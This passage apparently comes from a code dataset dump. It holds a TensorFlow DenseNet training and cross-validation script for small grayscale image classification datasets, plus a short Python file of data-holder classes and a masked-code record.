.run([b1_conv_printop, b2_conv_printop,\n b3_conv_printop, t1_conv_printop,\n t2_conv_printop, t3_conv_printop,\n t1_b_conv_printop, t2_b_conv_printop,\n t3_b_conv_printop], feed_dict={x: t_image,\n y_: t_label, keep_prob: 1.0, training: False}))\n if img_index == 0:\n b1_list = b1\n b2_list = b2\n b3_list = b3\n t1_list = t1\n t2_list = t2\n t3_list = t3\n t1_b_list = t1_b\n t2_b_list = t2_b\n t3_b_list = t3_b\n else:\n b1_list = np.append(b1_list, b1, axis=0)\n b2_list = np.append(b2_list, b2, axis=0)\n b3_list = np.append(b3_list, b3, axis=0)\n t1_list = np.append(t1_list, t1, axis=0)\n t2_list = np.append(t2_list, t2, axis=0)\n t3_list = np.append(t3_list, t3, axis=0)\n t1_b_list = np.append(t1_b_list, t1_b, axis=0)\n t2_b_list = np.append(t2_b_list, t2_b, axis=0)\n t3_b_list = np.append(t3_b_list, t3_b, axis=0)\n if img_index == 0:\n wrong_list_1 = wrong\n predicted_list_1 = predicted\n prediction_prob_1 = prediction_prob\n else:\n wrong_list_1 = np.append(wrong_list_1, wrong,\n axis=0)\n predicted_list_1 = np.append(predicted_list_1,\n predicted, axis=0)\n prediction_prob_1 = np.append(prediction_prob_1,\n prediction_prob)\n Accuracy = Accuracy / num_test\n accuracy_list.append(Accuracy)\n list_of_predicted_list.append(predicted_list_1)\n print('Average test accuracy: %g' % Accuracy)\n epoch_around = math.ceil(itrt_index * batch_size /\n total_trainImages)\n sio.savemat('D' + Dataset + '_' + file_name + '_' + str\n (epoch_around) + 'ep_' + data_type +\n '_predicted_labels_list.mat', {'wrong_list':\n wrong_list_1, 'predicted_list': predicted_list_1,\n 'Target_labels': Target_labels, 'prediction_prob':\n prediction_prob, 'b1_list': b1_list, 'b2_list':\n b2_list, 'b3_list': b3_list, 't1_list': t1_list,\n 't2_list': t2_list, 't3_list': t3_list, 't1_b_list':\n t1_b_list, 't2_b_list': t2_b_list, 't3_b_list':\n t3_b_list})\n elapsed_time = time.time() - start_time\n print('Elapsed Time: %f secs' % elapsed_time)\n print(\n 'Batch Size & Iteration & Total Train Imgs : %d & %d & %d'\n % (batch_size, itrt_index, total_trainImages))\n print('learning_rate : %g ' % learn_rate)\n print('1st conv FMaps : %d ' % fm1)\n print('number of layers in dense block : %d ' % num_layers)\n print('growth rate(k_fm) : %d ' % k_fm)\n print('filter size : %d ' % fs)\n print('bottleneck : %d' % bottleneck)\n print('dropout prob : %g ' % dropout_prob)\n print('data_type :', data_type)\n print('file_name :', file_name)\n print('FC nodes : %d' % fc_nodes[0])\n epoch_around = itrt_index * batch_size / total_trainImages\n print('Number of epochs : %f ' % epoch_around)\n plt.plot(np.squeeze(costs))\n plt.ylabel('cost')\n plt.xlabel('iterations (per tens)')\n plt.title('Learning rate =' + str(learn_rate))\n plt.show()\n if i % 100 == 0:\n train_accuracy = accuracy.eval(feed_dict={x: batch[0],\n y_: batch[1], keep_prob: 1.0, training: False})\n print('step %d, training accuracy %g' % (i, train_accuracy)\n )\n _, loss = sess.run([train_step, cross_entropy], feed_dict={\n x: batch[0], y_: batch[1], keep_prob: dropout_prob,\n training: True})\n iteration_cost = 0\n num_minibatches = int(total_trainImages / batch_size)\n iteration_cost += loss / num_minibatches\n costs.append(iteration_cost)\n if i % 100 == 0:\n print('Loss: ', loss)\n Accuracy = 0\n training_time = time.time() - start_time\n print('Training Time: %f secs' % training_time)\n if Dataset == '1':\n if file_name == '5th_fold':\n num_test = 13154\n else:\n num_test = 13155\n elif Dataset == '2':\n num_test = 503\n elif Dataset == '3':\n num_test = 400\n print(num_test)\n for img_index in range(num_test):\n t_image = np.array(Test_Images[img_index, :]).reshape(1, 784)\n t_label = np.array(Test_Labels[img_index, :]).reshape(1,\n number_of_classes)\n test_acc = accuracy.eval(feed_dict={x: t_image, y_: t_label,\n keep_prob: 1.0, training: False})\n Accuracy += test_acc\n wrong, predicted = sess.run([wrong_prediction_printop,\n predicted_labels_printop], feed_dict={x: t_image, y_:\n t_label, keep_prob: 1.0, training: False})\n if img_index <= 3:\n b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = sess.run([\n b1_conv_printop, b2_conv_printop, b3_conv_printop,\n t1_conv_printop, t2_conv_printop, t3_conv_printop,\n t1_b_conv_printop, t2_b_conv_printop,\n t3_b_conv_printop], feed_dict={x: t_image, y_:\n t_label, keep_prob: 1.0, training: False})\n if img_index == 0:\n b1_list = b1\n b2_list = b2\n b3_list = b3\n t1_list = t1\n t2_list = t2\n t3_list = t3\n t1_b_list = t1_b\n t2_b_list = t2_b\n t3_b_list = t3_b\n else:\n b1_list = np.append(b1_list, b1, axis=0)\n b2_list = np.append(b2_list, b2, axis=0)\n b3_list = np.append(b3_list, b3, axis=0)\n t1_list = np.append(t1_list, t1, axis=0)\n t2_list = np.append(t2_list, t2, axis=0)\n t3_list = np.append(t3_list, t3, axis=0)\n t1_b_list = np.append(t1_b_list, t1_b, axis=0)\n t2_b_list = np.append(t2_b_list, t2_b, axis=0)\n t3_b_list = np.append(t3_b_list, t3_b, axis=0)\n if img_index == 0:\n wrong_list = wrong\n predicted_list = predicted\n else:\n wrong_list = np.append(wrong_list, wrong, axis=0)\n predicted_list = np.append(predicted_list, predicted,\n axis=0)\n Accuracy = Accuracy / num_test\n print('Average test accuracy: %g' % Accuracy)\n accuracy_list.append(Accuracy)\n list_of_predicted_list.append(predicted_list)\n elapsed_time = time.time() - start_time\n print('Elapsed Time: %f secs' % elapsed_time)\n print(\n 'Batch Size & Iteration & Total Train Imgs : %d & %d & %d' %\n (batch_size, itrt_index, total_trainImages))\n print('learning_rate : %g ' % learn_rate)\n print('1st conv FMaps : %d ' % fm1)\n print('number of layers in dense block : %d ' % num_layers)\n print('growth rate(k_fm) : %d ' % k_fm)\n print('filter size : %d ' % fs)\n print('bottleneck : %d' % bottleneck)\n print('dropout prob : %g ' % dropout_prob)\n print('data_type :', data_type)\n print('file_name :', file_name)\n print('FC nodes : %d' % fc_nodes[0])\n epoch_around = math.ceil(iteration * batch_size / total_trainImages\n )\n if epoch_around == 51:\n epoch_around = 50\n print('Number of epochs : %f ' % epoch_around)\n plt.plot(np.squeeze(costs))\n plt.ylabel('cost')\n plt.xlabel('iterations (per tens)')\n plt.title('Learning rate =' + str(learn_rate))\n plt.show()\n sio.savemat('D' + Dataset + '_' + file_name + '_' + str(\n epoch_around) + 'ep_' + data_type +\n '_predicted_labels_list.mat', {'wrong_list': wrong_list,\n 'predicted_list': predicted_list, 'Target_labels':\n Target_labels, 'accuracy_list': accuracy_list,\n 'list_of_predicted_list': list_of_predicted_list, 'costs':\n costs, 'b1_list': b1_list, 'b2_list': b2_list, 'b3_list':\n b3_list, 't1_list': t1_list, 't2_list': t2_list, 't3_list':\n t3_list, 't1_b_list': t1_b_list, 't2_b_list': t2_b_list,\n 't3_b_list': t3_b_list})\n\n\nclass MyModel:\n num_layers = 4\n k_fm = 24\n fs = 3\n fm1 = 32\n bottleneck = 4\n dropout_prob = 0.8\n batch_size = [16]\n learn_rate = 0.001\n num_of_test = 40\n\n\nmodel = MyModel()\ndensenet('1', 'org', 1, model)\ndensenet('1', 'org', 2, model)\ndensenet('1', 'org', 3, model)\ndensenet('1', 'org', 4, model)\ndensenet('1', 'org', 5, model)\ndensenet('1', 'aug', 1, model)\ndensenet('1', 'aug', 2, model)\ndensenet('1', 'aug', 3, model)\ndensenet('1', 'aug', 4, model)\ndensenet('1', 'aug', 5, model)\ndensenet('2', 'org', 1, model)\ndensenet('2', 'org', 2, model)\ndensenet('2', 'org', 3, model)\ndensenet('2', 'org', 4, model)\ndensenet('2', 'org', 5, model)\ndensenet('2', 'aug', 1, model)\ndensenet('2', 'aug', 2, model)\ndensenet('2', 'aug', 3, model)\ndensenet('2', 'aug', 4, model)\ndensenet('2', 'aug', 5, model)\ndensenet('3', 'org', 1, model)\ndensenet('3', 'org', 2, model)\ndensenet('3', 'org', 3, model)\ndensenet('3', 'org', 4, model)\ndensenet('3', 'org', 5, model)\ndensenet('3', 'aug', 1, model)\ndensenet('3', 'aug', 2, model)\ndensenet('3', 'aug', 3, model)\ndensenet('3', 'aug', 4, model)\ndensenet('3', 'aug', 5, model)\n",
"step-5": "def densenet(D,DT,F,model):\r\n import scipy.io as sio\r\n import time\r\n import os\r\n import math\r\n import numpy as np\r\n import matplotlib.pyplot as plt\r\n\r\n\r\n Dataset = D\r\n if DT == 'org':\r\n data_type = 'original'\r\n else:\r\n data_type = 'augmented'\r\n\r\n fs = model.fs\r\n fm1 = model.fm1\r\n batch_size = model.batch_size[0] \r\n learn_rate = model.learn_rate\r\n num_layers = model.num_layers\r\n k_fm = model.k_fm\r\n bottleneck = model.bottleneck\r\n dropout_prob = model.dropout_prob\r\n num_of_test = model.num_of_test\r\n\r\n ###############\r\n # load training / testing set from CrossVal folder,\r\n # names for training set, 'D1_1st_fold_train.mat', 'Augmented_D1_1st_fold_train.mat'\r\n # name for testing set, 'D1_1st_fold_test.mat'\r\n ###############\r\n if F == 1:\r\n file_name = '1st_fold'\r\n elif F == 2:\r\n file_name = '2nd_fold'\r\n elif F == 3:\r\n file_name = '3rd_fold'\r\n elif F == 4:\r\n file_name = '4th_fold'\r\n elif F == 5:\r\n file_name = '5th_fold'\r\n path = os.path.join('CrossVal', 'D'+Dataset)\r\n print(\"path \" ,path)\r\n if data_type == 'original':\r\n Train =sio.loadmat(os.path.join(path, 'D'+Dataset+'_'+file_name+'_train.mat'))\r\n else:\r\n Train =sio.loadmat(os.path.join(path, 'Augmented_D'+Dataset+'_'+file_name+'_train.mat'))\r\n Test = sio.loadmat(os.path.join(path, 'D'+Dataset+'_'+file_name+'_test.mat'))\r\n\r\n if Dataset == '1':\r\n number_of_classes = 24\r\n num_of_ep = 50\r\n num_of_test = 20\r\n if data_type == 'augmented':\r\n train_imgs = 526190\r\n else:\r\n train_imgs = 52619\r\n iteration = math.ceil((num_of_ep * train_imgs) / batch_size)\r\n elif Dataset == '2':\r\n number_of_classes = 36\r\n num_of_ep = 200\r\n if data_type == 'augmented':\r\n train_imgs = 20120\r\n else:\r\n train_imgs = 2012\r\n iteration = math.ceil((num_of_ep * train_imgs) / batch_size)\r\n else:\r\n number_of_classes = 10\r\n num_of_ep = 200\r\n if data_type == 'augmented':\r\n train_imgs = 16000\r\n else:\r\n train_imgs = 1600\r\n iteration = math.ceil((num_of_ep * train_imgs) / batch_size)\r\n\r\n iteration_to_display = int(iteration / num_of_test) \r\n list_to_display = []\r\n for i in range(num_of_test):\r\n if i !=num_of_test:\r\n list_to_display.append(int(iteration_to_display*(i+1)))\r\n del i\r\n\r\n\r\n total_fm_Block_1 = fm1+(num_layers*k_fm)\r\n total_fm_Block_2 = total_fm_Block_1+(num_layers*k_fm)\r\n total_fm_Block_3 = total_fm_Block_2+(num_layers*k_fm)\r\n fc_nodes = [total_fm_Block_3 ]\r\n\r\n\r\n Train_Images = Train['trainImages']\r\n Train_Labels = Train['trainLabels2']\r\n total_trainImages = len(Train_Images[0,2])\r\n print(total_trainImages)\r\n Train_Images = Train_Images.reshape(784,total_trainImages).transpose().astype('float32')\r\n Train_Labels = Train_Labels.transpose().astype('float64')\r\n\r\n\r\n Test_Images = Test['testImages']\r\n Test_Labels = Test['testLabels2']\r\n total_testImages = len(Test_Images[0,2])\r\n Test_Images = Test_Images.reshape(784,total_testImages).transpose().astype('float32')\r\n Test_Labels = Test_Labels.transpose().astype('float64')\r\n Target_labels = np.argmax(Test_Labels,axis=1)\r\n\r\n del Test\r\n del Train\r\n\r\n import tensorflow as tf\r\n tf.reset_default_graph()\r\n g = tf.Graph()\r\n with g.as_default():\r\n tf.set_random_seed(1)\r\n\r\n def weight_variable(shape,n):\r\n initial = tf.truncated_normal(shape, stddev=0.1)\r\n return tf.Variable(initial,name=n)\r\n\r\n def bias_variable(shape,n):\r\n initial = tf.constant(0.1, shape=shape)\r\n return tf.Variable(initial,name=n)\r\n\r\n def avg_pool(input, s):\r\n return tf.nn.avg_pool(input, [ 1, s, s, 1 ], [1, s, s, 1 ], 'SAME')\r\n\r\n def max_pool(input, s):\r\n return tf.nn.max_pool(input, [ 1, s, s, 1 ], [1, s, s, 1 ], 'SAME')\r\n\r\n def conv2d_1(input, in_features, out_features, kernel_size, name=\"W\", with_bias=False):\r\n W = weight_variable([ kernel_size, kernel_size, in_features, out_features], name)\r\n conv = tf.nn.conv2d(input, W, [ 1, 1, 1, 1 ], padding='SAME')\r\n if with_bias:\r\n return conv + bias_variable([ out_features ])\r\n return conv\r\n\r\n def batch_activ_conv(current, in_features, out_features, kernel_size, is_training, keep_prob, idx, scope='conv_block'):\r\n with tf.variable_scope(scope):\r\n current = tf.layers.batch_normalization(current, scale=True, training=is_training)\r\n current = tf.nn.relu(current)\r\n current = conv2d_1(current, in_features, out_features, kernel_size, name=\"W\"+str(idx))\r\n current = tf.nn.dropout(current, keep_prob)\r\n return current\r\n\r\n def block(input, layers, in_features, growth, is_training, keep_prob, name=\"Block_\"):\r\n with tf.name_scope(name):\r\n with tf.variable_scope(name):\r\n current = input\r\n features = in_features\r\n for idx in range(layers):\r\n tmp = batch_activ_conv(current, features, growth, fs, is_training, keep_prob, idx+1, scope='conv_block_'+str(idx+1))\r\n current = tf.concat((current, tmp), axis=3)\r\n features += growth\r\n return current, features\r\n\r\n\r\n x = tf.placeholder(tf.float32, shape=[None, 784])\r\n y_ = tf.placeholder(tf.float32, shape=[None, number_of_classes])\r\n x_image = tf.reshape(x, [-1, 28, 28, 1])\r\n keep_prob = tf.placeholder(tf.float32)\r\n training = tf.placeholder(tf.bool)\r\n\r\n\r\n current = conv2d_1(x_image, 1, fm1, fs, name=\"W1\", with_bias=False)\r\n\r\n current, features = block(current, num_layers, fm1, k_fm, training, keep_prob, name=\"Block_1\")\r\n b1_conv_printop = tf.Print(current, [current])\r\n with tf.name_scope(\"transition_lyr\"):\r\n #current = batch_activ_conv(current, features, features, 1, training, keep_prob, 1, scope='Transition_layer_1')\r\n current = batch_activ_conv(current, features, bottleneck*k_fm, 1, training, keep_prob, 1, scope='Transition_layer_1')\r\n t1_b_conv_printop = tf.Print(current, [current])\r\n current = batch_activ_conv(current, bottleneck*k_fm, features, fs, training, keep_prob, 1, scope='Transition_layer_1_1')\r\n t1_conv_printop = tf.Print(current, [current])\r\n current = max_pool(current, 2)\r\n #current = avg_pool(current, 2)\r\n current, features = block(current, num_layers, features, k_fm, training, keep_prob, name=\"Block_2\")\r\n b2_conv_printop = tf.Print(current, [current])\r\n with tf.name_scope(\"transition_lyr_2\"):\r\n #current = batch_activ_conv(current, features, features, 1, training, keep_prob, 1, scope='Transition_layer_2')\r\n current = batch_activ_conv(current, features, bottleneck*k_fm, 1, training, keep_prob, 1, scope='Transition_layer_2')\r\n t2_b_conv_printop = tf.Print(current, [current])\r\n current = batch_activ_conv(current, bottleneck*k_fm, features, fs, training, keep_prob, 1, scope='Transition_layer_2_1')\r\n t2_conv_printop = tf.Print(current, [current])\r\n current = max_pool(current, 2)\r\n #current = avg_pool(current, 2)\r\n current, features = block(current, num_layers, features, k_fm, training, keep_prob, name=\"Block_3\")\r\n b3_conv_printop = tf.Print(current, [current])\r\n with tf.name_scope(\"transition_lyr_3\"):\r\n #current = batch_activ_conv(current, features, features, 1, training, keep_prob, 1, scope='Transition_layer_3')\r\n current = batch_activ_conv(current, features, bottleneck*k_fm, 1, training, keep_prob, 1, scope='Transition_layer_3')\r\n t3_b_conv_printop = tf.Print(current, [current])\r\n current = batch_activ_conv(current, bottleneck*k_fm, features, fs, training, keep_prob, 1, scope='Transition_layer_3_1')\r\n t3_conv_printop = tf.Print(current, [current])\r\n current = avg_pool(current, 7)\r\n current = tf.reshape(current, [tf.shape(current)[0], -1])\r\n\r\n with tf.name_scope(\"Dense_Last_lyr\"):\r\n W_fc3 = weight_variable([fc_nodes[0], number_of_classes],\"w_fc3\")\r\n b_fc3 = bias_variable([number_of_classes],\"b_fc3\")\r\n y_conv = tf.matmul(current, W_fc3) + b_fc3\r\n prediction_prob = tf.nn.softmax(y_conv)\r\n prediction_prob_printop = tf.Print(prediction_prob, [prediction_prob])\r\n\r\n with tf.name_scope(\"Xent\"):\r\n cross_entropy = tf.reduce_mean(\r\n tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y_conv))\r\n\r\n with tf.name_scope(\"train\"):\r\n extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\r\n with tf.control_dependencies(extra_update_ops):\r\n train_step = tf.train.AdamOptimizer(learn_rate).minimize(cross_entropy)\r\n\r\n with tf.name_scope(\"accuracy\"):\r\n correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))\r\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\r\n wrong_prediction = tf.not_equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))\r\n wrong_prediction_printop = tf.Print(wrong_prediction, [wrong_prediction])\r\n predicted_labels = tf.argmax(y_conv, 1)\r\n predicted_labels_printop = tf.Print(predicted_labels, [predicted_labels])\r\n\r\n index = 0\r\n index_end = index + batch_size\r\n remaining = 0\r\n start_time = time.time()\r\n costs = []\r\n accuracy_list = []\r\n list_of_predicted_list = []\r\n\r\n with tf.Session() as sess:\r\n sess.run(tf.global_variables_initializer(),tf.set_random_seed(0))\r\n for i in range(iteration):\r\n if index_end > total_trainImages:\r\n remaining = total_trainImages - (index_end-batch_size) \r\n images = Train_Images[(index_end-batch_size):total_trainImages, :]\r\n labels = Train_Labels[(index_end-batch_size):total_trainImages, :]\r\n index = 0\r\n index_end = index + batch_size - remaining\r\n images = np.vstack((images, Train_Images[index:index_end, :]))\r\n labels = np.vstack((labels, Train_Labels[index:index_end, :]))\r\n batch = (images, labels)\r\n index = index_end\r\n index_end = index + batch_size\r\n else:\r\n batch = (Train_Images[index:index_end, :], Train_Labels[index:index_end, :])\r\n index = index + batch_size \r\n index_end = index_end + batch_size\r\n\r\n if i in list_to_display:\r\n elapsed_time = time.time() - start_time\r\n print('Elapsed Time Before for loop: %f secs' % elapsed_time)\r\n Accuracy = 0\r\n itrt_index = i\r\n print('debug: %d & %d' % (iteration,i))\r\n\r\n if Dataset == '1':\r\n if file_name == '5th_fold':\r\n num_test = 13154\r\n else:\r\n num_test = 13155\r\n elif Dataset == '2':\r\n num_test = 503\r\n elif Dataset == '3':\r\n num_test = 400\r\n print(num_test)\r\n\r\n for img_index in range(num_test):\r\n t_image = np.array(Test_Images[img_index,:]).reshape(1,784)\r\n t_label = np.array(Test_Labels[img_index,:]).reshape(1,number_of_classes)\r\n test_acc = accuracy.eval(feed_dict={\r\n x: t_image, y_: t_label,\r\n keep_prob: 1.0, training:False})\r\n Accuracy += test_acc\r\n wrong, predicted, prediction_prob = sess.run([wrong_prediction_printop, \r\n predicted_labels_printop,prediction_prob_printop], \r\n feed_dict={\r\n x: t_image, y_: t_label, \r\n keep_prob: 1.0, training:False})\r\n if img_index <= 3:\r\n b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = sess.run([b1_conv_printop, b2_conv_printop, b3_conv_printop,\r\n t1_conv_printop,t2_conv_printop, t3_conv_printop, t1_b_conv_printop, t2_b_conv_printop, t3_b_conv_printop], \r\n feed_dict={\r\n x: t_image, y_: t_label, \r\n keep_prob: 1.0, training:False})\r\n if img_index == 0:\r\n b1_list = b1\r\n b2_list = b2\r\n b3_list = b3\r\n t1_list = t1\r\n t2_list = t2\r\n t3_list = t3\r\n t1_b_list = t1_b\r\n t2_b_list = t2_b\r\n t3_b_list = t3_b\r\n else:\r\n b1_list = np.append(b1_list,b1,axis=0)\r\n b2_list = np.append(b2_list,b2,axis=0)\r\n b3_list = np.append(b3_list,b3,axis=0)\r\n t1_list = np.append(t1_list,t1,axis=0)\r\n t2_list = np.append(t2_list,t2,axis=0)\r\n t3_list = np.append(t3_list,t3,axis=0)\r\n t1_b_list = np.append(t1_b_list,t1_b,axis=0)\r\n t2_b_list = np.append(t2_b_list,t2_b,axis=0)\r\n t3_b_list = np.append(t3_b_list,t3_b,axis=0) \r\n if img_index == 0 :\r\n wrong_list_1 = wrong\r\n predicted_list_1 = predicted\r\n prediction_prob_1 = prediction_prob\r\n else:\r\n wrong_list_1 = np.append(wrong_list_1,wrong,axis=0)\r\n predicted_list_1 = np.append(predicted_list_1,predicted,axis=0)\r\n prediction_prob_1 = np.append(prediction_prob_1, prediction_prob)\r\n\r\n\r\n Accuracy = Accuracy/num_test\r\n accuracy_list.append(Accuracy)\r\n list_of_predicted_list.append(predicted_list_1)\r\n print('Average test accuracy: %g' % Accuracy)\r\n epoch_around = math.ceil((itrt_index * batch_size) / total_trainImages)\r\n sio.savemat('D'+Dataset+'_'+file_name+'_'+str(epoch_around)+'ep_'+data_type+'_predicted_labels_list.mat', {'wrong_list':wrong_list_1, 'predicted_list': predicted_list_1, 'Target_labels':Target_labels, \r\n 'prediction_prob':prediction_prob, 'b1_list':b1_list, 'b2_list':b2_list, 'b3_list':b3_list, 't1_list':t1_list,\r\n 't2_list':t2_list, 't3_list':t3_list, 't1_b_list':t1_b_list, 't2_b_list':t2_b_list, 't3_b_list':t3_b_list})\r\n\r\n elapsed_time = time.time() - start_time\r\n print('Elapsed Time: %f secs' % elapsed_time)\r\n print('Batch Size & Iteration & Total Train Imgs : %d & %d & %d' % (batch_size, itrt_index, total_trainImages)) \r\n print('learning_rate : %g ' % learn_rate)\r\n print('1st conv FMaps : %d ' % fm1) \r\n print('number of layers in dense block : %d ' % num_layers) \r\n print('growth rate(k_fm) : %d ' % k_fm)\r\n print('filter size : %d ' % fs)\r\n print('bottleneck : %d' % bottleneck)\r\n print('dropout prob : %g ' % dropout_prob)\r\n print('data_type :', data_type)\r\n\r\n print('file_name :', file_name)\r\n\r\n print('FC nodes : %d' % fc_nodes[0])\r\n\r\n epoch_around = (itrt_index * batch_size) / total_trainImages\r\n print('Number of epochs : %f ' % epoch_around)\r\n\r\n # plot the cost\r\n plt.plot(np.squeeze(costs))\r\n plt.ylabel('cost')\r\n plt.xlabel('iterations (per tens)')\r\n plt.title(\"Learning rate =\" + str(learn_rate))\r\n plt.show()\r\n\r\n if i % 100 == 0:\r\n train_accuracy = accuracy.eval(feed_dict={\r\n x: batch[0], y_: batch[1], \r\n keep_prob: 1.0, training:False})\r\n print('step %d, training accuracy %g' % (i, train_accuracy))\r\n _, loss = sess.run([train_step, cross_entropy], \r\n feed_dict={x: batch[0], y_: batch[1], \r\n keep_prob: dropout_prob, training:True})\r\n\r\n iteration_cost = 0 # Defines a cost related to an epoch\r\n num_minibatches = int(total_trainImages / batch_size) # number of minibatches of size minibatch_size in the train set \r\n iteration_cost += loss / num_minibatches\r\n costs.append(iteration_cost)\r\n if i % 100 == 0:\r\n print ('Loss: ',loss)\r\n\r\n\r\n Accuracy = 0\r\n training_time = time.time() - start_time\r\n print('Training Time: %f secs' % training_time)\r\n\r\n\r\n if Dataset == '1':\r\n if file_name == '5th_fold':\r\n num_test = 13154\r\n else:\r\n num_test = 13155\r\n elif Dataset == '2':\r\n num_test = 503\r\n elif Dataset == '3':\r\n num_test = 400\r\n print(num_test)\r\n\r\n for img_index in range(num_test):\r\n t_image = np.array(Test_Images[img_index,:]).reshape(1,784)\r\n t_label = np.array(Test_Labels[img_index,:]).reshape(1,number_of_classes)\r\n test_acc = accuracy.eval(feed_dict={\r\n x: t_image, y_: t_label,\r\n keep_prob: 1.0, training:False})\r\n Accuracy += test_acc\r\n wrong, predicted = sess.run([wrong_prediction_printop, predicted_labels_printop], feed_dict={\r\n x: t_image, y_: t_label, \r\n keep_prob: 1.0, training:False})\r\n if img_index <= 3:\r\n b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = sess.run([b1_conv_printop, b2_conv_printop, b3_conv_printop,\r\n t1_conv_printop,t2_conv_printop, t3_conv_printop, t1_b_conv_printop, t2_b_conv_printop, t3_b_conv_printop], \r\n feed_dict={\r\n x: t_image, y_: t_label, \r\n keep_prob: 1.0, training:False})\r\n if img_index == 0:\r\n b1_list = b1\r\n b2_list = b2\r\n b3_list = b3\r\n t1_list = t1\r\n t2_list = t2\r\n t3_list = t3\r\n t1_b_list = t1_b\r\n t2_b_list = t2_b\r\n t3_b_list = t3_b\r\n else:\r\n b1_list = np.append(b1_list,b1,axis=0)\r\n b2_list = np.append(b2_list,b2,axis=0)\r\n b3_list = np.append(b3_list,b3,axis=0)\r\n t1_list = np.append(t1_list,t1,axis=0)\r\n t2_list = np.append(t2_list,t2,axis=0)\r\n t3_list = np.append(t3_list,t3,axis=0)\r\n t1_b_list = np.append(t1_b_list,t1_b,axis=0)\r\n t2_b_list = np.append(t2_b_list,t2_b,axis=0)\r\n t3_b_list = np.append(t3_b_list,t3_b,axis=0) \r\n if img_index == 0 :\r\n wrong_list = wrong\r\n predicted_list = predicted\r\n else:\r\n wrong_list = np.append(wrong_list,wrong,axis=0)\r\n predicted_list = np.append(predicted_list,predicted,axis=0)\r\n\r\n\r\n Accuracy = Accuracy/num_test\r\n print('Average test accuracy: %g' % Accuracy)\r\n accuracy_list.append(Accuracy)\r\n list_of_predicted_list.append(predicted_list)\r\n\r\n elapsed_time = time.time() - start_time\r\n print('Elapsed Time: %f secs' % elapsed_time)\r\n print('Batch Size & Iteration & Total Train Imgs : %d & %d & %d' % (batch_size, itrt_index, total_trainImages)) \r\n print('learning_rate : %g ' % learn_rate)\r\n print('1st conv FMaps : %d ' % fm1) \r\n print('number of layers in dense block : %d ' % num_layers) \r\n print('growth rate(k_fm) : %d ' % k_fm)\r\n print('filter size : %d ' % fs)\r\n print('bottleneck : %d' % bottleneck)\r\n print('dropout prob : %g ' % dropout_prob)\r\n print('data_type :', data_type)\r\n\r\n print('file_name :', file_name)\r\n\r\n print('FC nodes : %d' % fc_nodes[0])\r\n\r\n epoch_around = math.ceil((iteration * batch_size) / total_trainImages)\r\n if epoch_around == 51:\r\n epoch_around = 50\r\n print('Number of epochs : %f ' % epoch_around)\r\n\r\n\r\n # plot the cost\r\n plt.plot(np.squeeze(costs))\r\n plt.ylabel('cost')\r\n plt.xlabel('iterations (per tens)')\r\n plt.title(\"Learning rate =\" + str(learn_rate))\r\n plt.show()\r\n\r\n sio.savemat('D'+Dataset+'_'+file_name+'_'+str(epoch_around)+'ep_'+data_type+'_predicted_labels_list.mat', {'wrong_list':wrong_list, 'predicted_list': predicted_list, 'Target_labels':Target_labels, 'accuracy_list':accuracy_list, 'list_of_predicted_list':list_of_predicted_list, 'costs':costs, 'b1_list':b1_list, 'b2_list':b2_list, 'b3_list':b3_list, 't1_list':t1_list,\r\n 't2_list':t2_list, 't3_list':t3_list, 't1_b_list':t1_b_list, 't2_b_list':t2_b_list, 't3_b_list':t3_b_list})\r\n \r\n \r\nclass MyModel:\r\n num_layers = 4\r\n k_fm = 24\r\n fs = 3\r\n fm1 = 32\r\n bottleneck = 4\r\n dropout_prob = 0.8\r\n batch_size = [16]\r\n learn_rate = 0.001\r\n num_of_test = 40\r\n\r\nmodel = MyModel()\r\n \r\n\r\ndensenet('1','org',1,model)\r\ndensenet('1','org',2,model)\r\ndensenet('1','org',3,model)\r\ndensenet('1','org',4,model)\r\ndensenet('1','org',5,model)\r\n\r\ndensenet('1','aug',1,model)\r\ndensenet('1','aug',2,model)\r\ndensenet('1','aug',3,model)\r\ndensenet('1','aug',4,model)\r\ndensenet('1','aug',5,model)\r\n\r\ndensenet('2','org',1,model)\r\ndensenet('2','org',2,model)\r\ndensenet('2','org',3,model)\r\ndensenet('2','org',4,model)\r\ndensenet('2','org',5,model)\r\n \r\ndensenet('2','aug',1,model)\r\ndensenet('2','aug',2,model)\r\ndensenet('2','aug',3,model)\r\ndensenet('2','aug',4,model)\r\ndensenet('2','aug',5,model)\r\n\r\ndensenet('3','org',1,model)\r\ndensenet('3','org',2,model)\r\ndensenet('3','org',3,model)\r\ndensenet('3','org',4,model)\r\ndensenet('3','org',5,model)\r\n\r\ndensenet('3','aug',1,model)\r\ndensenet('3','aug',2,model)\r\ndensenet('3','aug',3,model)\r\ndensenet('3','aug',4,model)\r\ndensenet('3','aug',5,model)\r\n",
"step-ids": [
1,
2,
3,
5,
6
]
}
|
[
1,
2,
3,
5,
6
] |
#!/usr/bin/env python
# encoding: utf8
#from __future__ import unicode_literals
class RefObject(object):
def __init__(self,):
self.pose = []
self.name = []
self.time = None
self.id = None
def set_data(self,pose, name, time, Id):
self.pose = pose
self.name = name
self.time = time
self.id = Id
class Datafunction(object):
def __init__(self,):
self.series = []
self.ref_point = RefObject()
self.clAss = None
self.first_time = None
self.last_time = None
self.id = None
def set_series(self,series):
self.series = series
def set_time(self, first, last):
self.first_time = first
self.last_time = last
def set_id(self,Id):
self.id = Id
def set_class(self, clAss):
self.clAss = clAss
def set_ref_object(self,pose, name, time, Id):
self.ref_point.set_data(pose, name, time, Id)
def get_series(self,):
return self.series
def get_class(self,):
return self.clAss
def get_id(self,):
return self.id
def get_ref_point(self,):
return self.ref_point
def get_first_time(self,):
return self.first_time
def get_last_time(self):
return self.last_time
if __name__ == '__main__':
print("Hello")
|
normal
|
{
"blob_id": "7611a57705939ce456e34d5ae379d6ca748b13c3",
"index": 1884,
"step-1": "<mask token>\n\n\nclass Datafunction(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def get_first_time(self):\n return self.first_time\n\n def get_last_time(self):\n return self.last_time\n\n\n<mask token>\n",
